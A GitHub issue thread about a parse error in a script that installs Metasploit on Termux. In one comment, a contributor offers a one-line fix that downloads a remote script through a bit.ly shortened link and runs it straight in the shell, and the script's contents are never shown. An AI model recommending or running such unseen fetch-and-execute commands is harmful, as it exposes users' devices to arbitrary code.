### ISSUE TITLE
[BUG]/proc/self/fd/11:101: parse error near `then'

### ISSUE THREAD

**Issue by RaghaovSharma** [gushmazuko/metasploit_in_termux#171] opened 2022-08-04 17:28 UTC
**Important**
Do not duplicate, search your issue before creating one!

**Describe the bug**

**Screenshots**

**Smartphone (please complete the following information):**
 - Device: [e.g. OnePlus 8]
 - OS: [e.g. Android 10]

**Comment by krisdowis** [comment] 2022-08-05 02:22
Fiesta of all there isn't enough details about the bug

And also I am not sure that this is the repo you cloned

**Comment by krisdowis** [comment] 2022-08-05 02:36
This issue is a duplicate of #163 and #170
But you can solve the bug by using the command below

This was my mistake I made an error while contributing to the code but I already opened a pull request to fix it The owner hasn't approved yet because he is busy but you can fix with this command for now
 ```
source <(curl -fsSL https ://bit.ly/3cTWx5g)
```

Please note this is to fix the error for now I will remove/disable the link once owner approves pull request or fixes error

Please let me know if you were able to fix the problem or if you still have errors

**Comment by HackGodislive** [comment] 2022-08-14 16:24
Bro it's working thanks for your help

**Comment by krisdowis** [comment] 2022-08-15 02:02
> Bro it's working thanks for your help

You are welcome

**Closed** 2022-08-16 21:29 UTC
Labels: resolved
